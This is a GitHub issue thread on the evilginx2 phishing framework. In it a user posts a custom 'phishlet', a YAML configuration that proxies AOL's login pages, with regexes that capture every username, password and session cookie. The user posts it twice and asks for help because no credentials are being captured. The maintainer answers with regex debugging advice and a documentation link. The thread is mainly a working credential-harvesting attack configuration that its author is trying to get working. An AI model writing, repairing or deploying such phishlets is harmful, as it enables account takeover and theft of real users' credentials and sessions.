### ISSUE TITLE
Phishlets

### ISSUE THREAD

**Issue by dmtd2018** [kgretzky/evilginx2#107]
I'm made two custom phishlets both of them work fine with redirecting even with logging after fulfilling the login details you got logged successfully to the account. The issue i have is not receiving anything like connections of visitor on the evilginx or any credentials captured.

Thank You in advance

Here is one of the phishlets:

name: 'aol'
author: '@dmtd2018'
min_ver: '2.1.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'aol.com', session: true, is_landing: false}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'aol.com', session: false, is_landing: true}
  - {phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, is_landing: false}
sub_filters:
  - {hostname: 'aol.com', sub: '', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 'login.aol.com', sub: 'login', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 's.yimg.com', sub: 's', domain: 'yimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.aol.com'
    keys: ['.*,regexp']
user_regex:
  key: 'username'
  re: '(.*)'
pass_regex:
  key: 'password'
  re: '(.*)'
landing_path:
  - '/'

**Comment by kgretzky** [comment]
I see that you are missing `*` in some of the regular expressions. Is it intentional or an issue with paste?
For example `keys: ['.,regexp']` should be `keys: ['.*,regexp']`

**Comment by dmtd2018** [comment]
It is paste issue i use it exactly how you showed keys: ['.*,regexp']

**Comment by kgretzky** [comment]
Can you paste again using a code block and verify if it was pasted properly?
Otherwise I can't find the real error.

**Comment by dmtd2018** [comment]
```name: 'aol'
author: '@dmtd'
min_ver: '2.1.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'aol.com', session: true, is_landing: false}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'aol.com', session: false, is_landing: true}
  - {phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, is_landing: false}
sub_filters:
  - {hostname: 'aol.com', sub: '', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 'login.aol.com', sub: 'login', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 's.yimg.com', sub: 's', domain: 'yimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.aol.com'
    keys: ['.*,regexp']
user_regex:
  key: 'username'
  re: '(.*)'
pass_regex:
  key: 'password'
  re: '(.*)'
landing_path:
  - '/'
```

**Comment by CyberTheReape** [comment]
user_regex >>> username

pass_regex  >> password

is it will change ?

**Comment by kgretzky** [comment]
I won't explain it better than I already did:
https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)

**Comment by dmtd2018** [comment]
> 
> 
> I won't explain it better than I already did:
> https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)

So what is the reason? The phishlet is working fine and the only issue is that i don't receive any visitor or communication on evilginx like if i'm using the twitter phishlet and i think that both mine and twitter are identical. Help will be really appreciated


Thank You in advance
